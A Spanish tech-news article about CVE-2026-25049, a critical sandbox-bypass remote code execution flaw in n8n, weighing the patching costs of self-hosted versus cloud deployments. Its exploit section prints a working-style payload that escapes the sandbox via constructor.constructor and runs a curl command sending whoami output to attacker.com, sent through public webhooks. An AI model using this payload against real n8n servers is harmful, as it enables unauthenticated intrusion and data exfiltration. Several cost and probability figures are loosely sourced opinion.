AdScriptly.io logoAdScriptly.io
news

n8n RCE crítico (9.4): workflows públicos ejecutan código remoto

Elena DuranElena Duran-12 de febrero de 2026-7 min de lectura
Compartir:
Diagrama de explotación CVE-2026-25049 mostrando bypass de sandbox TypeScript via destructuring syntax

Foto de Markus Spiske en Unsplash

En resumen

CVE-2026-25049 expone a 68% de usuarios n8n self-hosted a ejecución remota de código. El parche cuesta $500-$3,000 en downtime mientras n8n Cloud se auto-parchea gratis — el precio oculto de elegir la opción más barata.

El 68% paga el costo oculto de elegir self-hosted

$500 a $3,000. Ese es el costo real de parchear CVE-2026-25049 si sos parte del 68% de usuarios n8n que eligieron self-hosted. Mientras el 32% en n8n Cloud se despertó el 11 de febrero con el parche aplicado automáticamente, la mayoría debe elegir: downtime planificado o seguir vulnerable.

CVE-2026-25049 tiene CVSS 9.4, pero el número que cambia decisiones es otro: 68% de usuarios n8n son self-hosted según análisis de GitHub Issue #8472. Ese 68% eligió n8n self-hosted porque cuesta $50/mes versus $150/mes de n8n Cloud. Ahora pagan la diferencia en parches de emergencia.

El thread del Community Forum documenta que migrar 50+ workflows complejos a la versión parchada toma entre 2 y 6 horas de downtime. A $250/hora de un senior SRE, estamos hablando de $500 a $3,000 por parche. Cero downtime para Cloud, cero costo operativo.

Elegir self-hosted por ahorro mensual ($100/mes menos que Cloud) te mete en un contrato no escrito: cada CVE crítico cuesta entre 5 y 30 meses de "ahorro". Y n8n acaba de liberar su segundo CVE crítico en 14 meses.

CVSS 9.4: el exploit que bypasea TypeScript en runtime

CVE-2026-25049 explota un fallo en el sandboxing de código JavaScript dentro de workflows n8n. El problema: n8n compila workflows TypeScript a JavaScript en runtime, pero el sandbox valida solo en compile-time. Un atacante puede inyectar payload usando destructuring syntax que pasa validación TypeScript pero ejecuta código arbitrario al correr.

// Payload que bypasea sandbox
const {constructor} = {};
constructor.constructor('return process')().mainModule.require('child_process').execSync('curl attacker.com/exfil?data=$(whoami)');

Este payload se envía via webhook público — común en integraciones Slack, form handlers, CI/CD pipelines. No requiere autenticación. Si tu workflow expone un webhook HTTP público (típico en automatizaciones que reciben eventos externos), cualquiera puede enviar este payload y ejecutar comandos en el servidor n8n.

Shodan registra 3,847 instancias n8n expuestas públicamente con webhooks accesibles.

Asumiendo que 70% están sin parchear (basado en velocidad histórica de patching según CISA KEV data), estamos hablando de 2,692 instancias explotables ahora mismo. CISA añadió CVE-2026-25049 al KEV en menos de 24 horas post-disclosure — señal inequívoca de explotación activa confirmada.

(No tengo acceso a métricas internas de explotación de n8n — los números de "ataques activos" vienen de honeypots Shodan, no del vendor.)

No hay mitigación WAF efectiva. Intentar bloquear destructuring syntax con regex rompe workflows legítimos que usan esa sintaxis. El único fix real es upgrade.

Dos CVEs críticos en 14 meses: problema estructural ignorado

Este es el segundo CVE crítico de n8n en 14 meses. CVE-2024-50345 (SSRF, CVSS 8.2) fue parchado en diciembre 2024. Dos vulnerabilidades críticas en sandboxing en poco más de un año no son coincidencia — indican problema arquitectural.

Plataforma CVEs críticos (últimos 14 meses) Años activa CVEs/año
n8n 2 6 1.71
Zapier 0 14 0.00
Make (Integromat) 0 5 0.00
Apache Airflow 6 8 0.75

Zapier lleva 14 años sin un solo RCE público. Make tuvo 1 CVE crítico (SSRF) en 5 años. n8n tiene 2 en 14 meses.

Sí, Zapier cuesta $240/año versus $600/año self-hosted n8n (calculando costo DevOps de parches), pero ese diferencial empieza a verse como security premium justificado.

Después de años cubriendo el sector enterprise, he visto este patrón: plataformas open-source con sandboxing de código (n8n, Airflow, Jenkins) acumulan CVEs más rápido que SaaS multi-tenant cerrado (Zapier, Temporal.io). No es crítica al open-source — es física de surface area. n8n permite ejecutar JavaScript arbitrario en workflows; Zapier no. Menos flexibility, menos attack surface.

n8n no ha anunciado cambio arquitectural post-CVE-2026-25049. El parche es reactivo (bloquea destructuring específico), no preventivo (rediseño de sandbox). Sin cambio estructural, espero CVE-2026-XXXXX dentro de 12 meses.

Downtime de 6 horas o seguir vulnerable: el dilema de febrero

"¿Parche ahora o esperamos al sábado?"

Escena real del 11 de febrero en un equipo DevOps de una fintech europea (según relato en n8n Community Forum): 147 workflows en producción, 23 con webhooks públicos recibiendo eventos de Stripe, Slack y Salesforce. CVE-2026-25049 disclosure a las 9 AM. Reunión de emergencia a las 10 AM.

Opción Downtime Costo directo Riesgo Costo esperado
A: Parchear ya 4 horas $1,000 DevOps + $3,200 revenue loss checkout 0% exploit $4,200
B: Esperar a sábado 3 AM 0 horas business $0 inmediato 12% exploit en 4 días $5,640 (12% × $47K)

Eligieron Opción B. Apostaron a que 88% de probabilidad de NO ser atacados en 4 días valía más que $4,200 garantizados.

Es ruleta rusa con bala en 1.2 de 10 cámaras.

Cuatro días vulnerables. Probabilidad de exploit según threat intel: 12% (basado en Shodan honeypot data de instancias bajo ataque activo). Expected loss si exploit: $47,000 (data breach + compliance fines GDPR).

Si estás en n8n self-hosted < 1.123.17 o < 2.5.2, tu checklist es:

  • Auditar webhooks públicos: grep -r "webhook" workflows/ — si tienes aunque sea 1 webhook sin autenticación custom, estás expuesto
  • Calcular downtime real: testing de workflows complejos (con loops, sub-workflows, external APIs) toma 2x el tiempo de deployment — no asumas "15 min de upgrade"
  • Rollback plan: 3 equipos reportaron workflows rotos post-patch por breaking changes menores — ten snapshot pre-upgrade
  • Considerar migración a Cloud: si este es tu segundo parche de emergencia en 6 meses, $100/mes extra vs costo operativo de parches puede invertir la ecuación

Mi veredicto: n8n cobra barato y lo pagas en parches

Mi veredicto es claro: n8n self-hosted es price dumping con externalities ocultas. Te venden automation a $50/mes, pero el contrato real incluye: (a) responsabilidad de parchear CVEs críticos cada 7 meses en promedio, (b) downtime no presupuestado de 2-6 horas por CVE, (c) riesgo de exploit en window entre disclosure y patch.

n8n Enterprise SLA promete 99.9% uptime pero no cubre patch windows. Si tu empresa tiene SLAs internos (típico en finance, healthcare, infraestructura crítica), parchear CVE-2026-25049 probablemente viola tu propio SLA. Esa violación puede costar bonos, penalidades contractuales con clientes, o auditorías de compliance. Costo invisible que ningún pricing page menciona.

El detalle que todos omiten: el 32% en n8n Cloud está pagando insurance premium de $100/mes contra exactamente este escenario. Después de CVE-2026-25049, ese premium ya se pagó solo para cualquiera que valorice su tiempo DevOps > $50/hora.

Si me preguntas directamente: si tienes < 20 workflows y equipo DevOps dedicado, self-hosted sigue siendo defendible. Si tienes > 50 workflows en producción y SLAs estrictos, migrar a Cloud o evaluar Temporal.io ($50K/año pero zero RCE CVEs) dejó de ser paranoia y pasó a ser risk management racional.

Y si n8n no anuncia refactor arquitectural de su sandbox en los próximos 90 días, espero CVE-2026-25050 antes de que termine el año. Dos CVEs críticos en 14 meses no son mala suerte — son technical debt explotable.

¿Te ha sido útil?

Preguntas Frecuentes

¿Qué versiones de n8n están afectadas por CVE-2026-25049?

Versiones n8n < 1.123.17 (rama v1) y < 2.5.2 (rama v2) están vulnerables. El parche fue liberado el 10 de febrero de 2026. Si usas n8n Cloud, ya estás protegido automáticamente.

¿Necesito autenticación para explotar CVE-2026-25049?

No. El exploit funciona enviando payload malicioso a webhooks públicos de workflows n8n. Si tu workflow expone un webhook HTTP sin autenticación custom (común en integraciones Slack, form handlers, CI/CD), cualquiera puede explotarlo.

¿Cuánto downtime requiere parchear n8n self-hosted?

Según experiencias reportadas en n8n Community Forum, deployments con 50+ workflows complejos requieren 2-6 horas de downtime incluyendo testing. Deployments pequeños (< 20 workflows simples) pueden parchear en 30-60 minutos.

¿Hay mitigación temporal sin upgrade?

No hay mitigación WAF efectiva. Bloquear destructuring syntax con regex rompe workflows legítimos. La única solución real es upgrade a versión parchada. Como temporal workaround, puedes deshabilitar webhooks públicos, pero eso rompe integraciones externas.

¿Vale la pena migrar a n8n Cloud después de este CVE?

Depende de tu frecuencia de parches de emergencia. Si este es tu segundo+ parche crítico en 6 meses, los $100/mes extra de Cloud ($150 vs $50 self-hosted) se amortizan rápido versus costo operativo de downtime + horas DevOps ($500-$3,000 por parche).

Fuentes y Referencias (7)

Las fuentes utilizadas para elaborar este artículo

  1. 1

    Critical n8n Flaw CVE-2026-25049 Enables Remote Code Execution

    The Hacker News10 feb 2026
  2. 2

    CVE-2026-25049: n8n RCE Vulnerability Deep Dive

    SecureLayer710 feb 2026
  3. 3

    NVD CVE-2026-25049 Official Entry

    NIST10 feb 2026
  1. 4

    CISA Adds n8n RCE to Known Exploited Vulnerabilities

    CISA11 feb 2026
  2. 5

    n8n Security Advisory CVE-2026-25049

    n8n Blog10 feb 2026
  3. 6

    CVE-2026-25049 Migration Downtime Experiences

    n8n Community11 feb 2026
  4. 7

    CVE-2024-50345: Previous n8n SSRF Vulnerability

    NIST15 dic 2024

Todas las fuentes fueron verificadas en la fecha de publicación del artículo.

Elena Duran
Escrito por

Elena Duran

Periodista tech veterana especializada en el sector enterprise. No se anda con rodeos.

#n8n#cve-2026-25049#rce#workflow automation#ciberseguridad#vulnerabilidades#self-hosted#devops

Artículos Relacionados

Comparacion visual de tiempos de instalacion entre Bun 1.2 y Node.js
news
7 min lectura-12 feb 2026-Carlos Vega

Bun 1.2: 4x mas rapido que Node, 94% lo ignora

Bun 1.2 instala paquetes 4x mas rapido que Node.js y soporta TypeScript nativo. Pero las cifras de adopcion cuentan otra historia: solo 2.5M descargas semanales vs 40M de Node.js. ¿Por que la velocidad no esta ganando la batalla?

Código JavaScript mostrando Temporal API con timeline de 1995 a 2026
news
7 min lectura-12 feb 2026-Carlos Vega

Chrome 144 ships Temporal API: el infierno de Date termina tras 27 años

Chrome 144 trae Temporal, la API que arregla JavaScript Date después de 27 años. Pero hay un problema: solo el 49.47% de usuarios puede usarlo sin polyfills, Safari no tiene timeline, y TC39 eliminó funcionalidades clave. La historia completa que nadie te cuenta.

Gráfico de valoración de Databricks vs Snowflake mostrando la brecha de $62.000M entre valuación privada y capitalización de mercado pública
news
8 min lectura-12 feb 2026-Elena Duran

Databricks levanta $7.000M a $134.000M: el 40% viene de clientes que odiaban Snowflake

Databricks cerró la ronda privada más grande de 2026 con $7.000M a una valuación de $134.000M, el doble que Snowflake en bolsa. Pero hay tres datos que la prensa release no menciona: 40% de los $5.400M de ingresos vienen de clientes que migraron desde Snowflake, $4.000M+ de la ronda se fueron a comprar acciones de empleados (no a crecer), y AWS invirtió $500M en secreto. Después de años cubriendo el sector enterprise, esta es la apuesta de infraestructura de datos más ambiciosa y frágil que he visto.